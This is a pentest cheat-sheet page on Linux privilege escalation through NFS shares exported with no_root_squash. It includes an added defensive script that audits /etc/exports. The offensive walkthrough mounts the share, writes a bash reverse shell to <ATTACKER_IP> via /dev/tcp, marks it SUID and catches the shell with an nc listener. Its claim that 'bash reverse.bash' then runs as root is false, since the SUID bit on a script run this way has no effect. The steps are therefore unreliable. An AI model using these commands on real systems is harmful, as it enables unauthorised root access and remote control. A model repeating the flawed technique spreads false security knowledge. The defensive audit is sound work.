PRIMARY CATEGORY → LINUX PRIVESC

NFS Directives

NFS Configuration File → /etc/exports

  • no_root_squash → Grants the Client Side Root User the authority to access, read and write resources as the Root User of the NFS Server

  • no_all_squash → Same as above but applies to non-root users
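
A defender-side check for the directive described above, as an added example that is not part of the original notes: the hypothetical helper `audit_exports` parses an exports file (default `/etc/exports`) and lists every path/client pair where `no_root_squash` is in effect. The sample file, its hosts and its paths are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): list exports where root squashing is off.
# audit_exports is a hypothetical helper; it prints "<path>\t<client>" per finding
# and returns 1 if there is any finding, 0 otherwise.
audit_exports() {
  awk '
    /\\$/ { sub(/\\$/, ""); buf = buf $0; next }     # join continuation lines
    {
      line = buf $0; buf = ""
      sub(/#.*/, "", line)                            # drop comments
      n = split(line, f, " ")
      path = f[1]; defaults = ""
      for (i = 2; i <= n; i++) {
        if (f[i] ~ /^-/) { defaults = substr(f[i], 2); continue }  # "-opts" = line defaults
        client = f[i]; opts = defaults
        if (match(client, /\(.*\)$/)) {               # split "host(opts)"
          opts = defaults "," substr(client, RSTART + 1, RLENGTH - 2)
          client = substr(client, 1, RSTART - 1)
        }
        if (client == "") client = "(any host)"       # bare "(opts)" applies to every client
        squash = 1                                    # root_squash is the default
        m = split(opts, o, ",")
        for (j = 1; j <= m; j++) {                    # a later option overrides an earlier one
          if (o[j] == "no_root_squash") squash = 0
          else if (o[j] == "root_squash") squash = 1
        }
        if (!squash) { print path "\t" client; found = 1 }
      }
    }
    END { exit (found ? 1 : 0) }
  ' "${1:-/etc/exports}"
}

# Constructed sample exports file (hosts and paths are made up for the demo).
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
# constructed sample
/srv/public   *(ro,root_squash)
/srv/backup   10.0.0.5(rw,sync,no_root_squash)
/srv/build    -rw,no_root_squash ci1.example.test \
              ci2.example.test(root_squash)
/srv/home     10.0.0.0/24(rw) (ro,no_root_squash)
EOF

audit_exports "$sample" || echo "exports with no_root_squash are listed above" >&2
```

On each listed entry, replace `no_root_squash` with `root_squash` (the default) and reload the export table with `exportfs -ra`.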


Privilege Escalation

Therefore, if no_root_squash is configured for an NFS Share and the attacker has SSH access to the target as an unprivileged user, proceed as follows →

Local Directory Creation

Create a local directory where the NFS Share is to be mounted

mkdir <LOCAL_FOLDER>

Mounting NFS Share

Mount the remote shared folder/filesystem in the created directory

mount --types nfs --options vers=2,nolock <TARGET>:<REMOTE_RESOURCE_PATH> <LOCAL_FOLDER> # Or --options vers={3,4}

Payload Creation as Local Root User inside NFS Share

Access the remote resource through the local folder and create a payload, e.g. a reverse shell

cd <LOCAL_FOLDER>
printf "bash -c 'bash -i &> /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1'" > reverse.bash

SUID Privilege Assignment on the Payload

Simply assign the SUID Privilege to the previous payload

chmod +s reverse.bash # Or chmod 4755 reverse.bash

Payload Execution from the Target

On the attacker side, set up a listening socket with the IP Address and TCP Port specified in the payload

nc -nlvp <ATTACKER_PORT>

Then, from the target as the unprivileged user via SSH, run the payload

Note that the payload will run as Root due to the SUID permission

bash reverse.bash

After that, a shell as Root is obtained